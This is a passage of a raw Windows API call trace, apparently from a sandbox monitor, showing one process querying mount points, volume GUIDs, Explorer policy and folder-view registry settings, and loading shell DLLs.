FileHandle => 0xffffffff FileInformation => \xbb\x01\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xb8\xeb\x1a\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00 \xec\x1a\x00\xc8\xf2\x13\x00\xc0\x9a\x83|\xdc\xdd\x13\x00\x18\x0e\xa0| \xec\x1a\x00\xd8\xee\x1a\x00\x05\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00C\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => D\x00r\x00i\x00v\x00e\x00\x00\x00 ValueName => BaseClass Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => @\x00\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xd0\xa9\x17\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00\x00\xe3\x18\x00\xd8\xee\x1a\x00\xc8\xf2\x13\x00\xdc\xdd\x13\x00\xde \xa0|\x00\xe3\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00D\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \xbb\x01\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xd0\xa9\x17\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00\x00\xe3\x18\x00\xc8\xf2\x13\x00\xc0\x9a\x83|\xdc\xdd\x13\x00\x18\x0e\xa0|\x00\xe3\x18\x00\xd8\xee\x1a\x00\x05\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00D\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => D\x00r\x00i\x00v\x00e\x00\x00\x00 ValueName => BaseClass Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000202 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegEnumKeyW |
Handle => 0x00000202 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fe Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fe |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegEnumKeyW |
Handle => 0x00000202 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000202 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x00193e98 | |
| 19:40:26,443 | 252 | LdrLoadDll |
Flags => 1300444 BaseAddress => 0x7c9c0000 FileName => SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 102 FunctionName => FunctionAddress => 0x7c9ef5e2 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrLoadDll |
Flags => 1300484 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemAlloc FunctionAddress => 0x774fd060 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 320 FunctionName => FunctionAddress => 0x773e0a75 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 324 FunctionName => FunctionAddress => 0x773e0c22 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 323 FunctionName => FunctionAddress => 0x773e0b17 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000202 Registry => 0x80000000 SubKey => Directory |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000202 SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fe Registry => 0x00000202 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000202 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 DataLength => 4 ValueName => DontShowSuperHidden Type => 1300148 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x00000200 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 36 ValueName => ShellState Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => ValueName => ShellState |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ForceActiveDesktopOn Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoActiveDesktop Type => 1299476 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\System |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoWebView Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ClassicShell Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => SeparateProcess Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoNetCrawling Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoSimpleStartMenu Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x00000200 SubKey => Advanced |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 2 ValueName => Hidden |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => ShowCompColor |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => HideFileExt |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => DontPrettyPath |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => ShowInfoTip |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => HideIcons |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => MapNetDrvBtn |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => WebView |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => Filter |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ShowSuperHidden Type => 1300648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => SeparateProcess |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoNetCrawling Type => 1300648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fe SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fe SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020a Registry => 0x80000000 SubKey => Folder |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x0000020a SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 2 ValueName => AlwaysShowExt Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 388 FunctionName => FunctionAddress => 0x773e1535 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fe |
